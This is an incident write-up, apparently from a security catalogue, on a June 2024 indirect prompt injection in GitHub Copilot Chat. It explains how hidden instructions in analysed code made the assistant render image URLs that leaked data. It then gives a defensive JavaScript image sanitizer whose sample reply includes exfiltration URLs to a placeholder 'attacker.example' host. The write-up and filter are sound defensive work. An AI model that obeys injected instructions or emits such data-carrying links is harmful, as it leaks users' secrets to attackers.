Indirect Prompt Injection · High

GitHub Copilot Chat prompt injection to data exfiltration

June 2024 · GitHub Copilot Chat
What happened
Hidden instructions in untrusted source code that Copilot analyzed could fully control its responses and exfiltrate data: the injected instructions made Copilot render an image tag whose URL pointed at a remote server and carried the stolen data, so the client's request to fetch the image delivered that data to the server.
Root cause
Copilot Chat followed injected instructions from analyzed code and rendered remote images, allowing data to leak via the image-request URL.
Fix / outcome
GitHub mitigated by disabling image rendering in Copilot Chat. (Distinct from the more severe 2025 CamoLeak issue.)
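A defensive counterpart to that mitigation, added here as an example and not GitHub's own code: a filter that strips remote image references from model-generated Markdown (and inline HTML) before a chat UI renders it, blocking everything by default and logging what was blocked so an injection attempt becomes a detectable event. The domain names and the sample reply are constructed for the example.

```javascript
// Added example (not GitHub Copilot code): neutralize the image-request
// exfiltration channel by refusing to render images whose host is not
// explicitly allow-listed. An empty allow-list (the default) matches the
// "disable image rendering" mitigation described above.

// Inline Markdown images: ![alt](url "title")
const MD_IMAGE = /!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)/g;
// Raw HTML images the renderer might pass through: <img src="url">
const HTML_IMAGE = /<img\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)[^>]*>/gi;

function isAllowed(rawUrl, allowedHosts) {
  let url;
  try { url = new URL(rawUrl); } catch { return false; } // relative or malformed: block
  if (url.protocol !== "https:") return false;           // http:, data:, file: ... : block
  return allowedHosts.includes(url.hostname);
}

// Returns the rewritten text plus every URL that was refused, so the caller
// can log or alert on them (a long query string is the exfiltration payload).
function sanitizeAssistantMarkdown(markdown, allowedHosts = []) {
  const blocked = [];
  const keepOrDrop = (match, src, placeholder) => {
    if (isAllowed(src, allowedHosts)) return match;
    blocked.push(src);
    return placeholder;
  };
  let text = markdown.replace(MD_IMAGE, (m, alt, src) =>
    keepOrDrop(m, src, `[image removed: ${alt || "untrusted source"}]`));
  text = text.replace(HTML_IMAGE, (m, src) => keepOrDrop(m, src, "[image removed]"));
  return { text, blocked };
}

// Constructed sample: what an assistant reply might look like after following
// injected instructions. "attacker.example" is a placeholder host.
const SAMPLE_REPLY = [
  "Here is a summary of the file.",
  "![status](https://attacker.example/i.png?d=QVBJX0tFWQ==)",
  '<img src="http://attacker.example/p">',
  "![ok](https://github.com/logo.png)",
].join("\n");

const result = sanitizeAssistantMarkdown(SAMPLE_REPLY, ["github.com"]);
console.log(result.text);
console.log("blocked:", result.blocked);
```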
Sources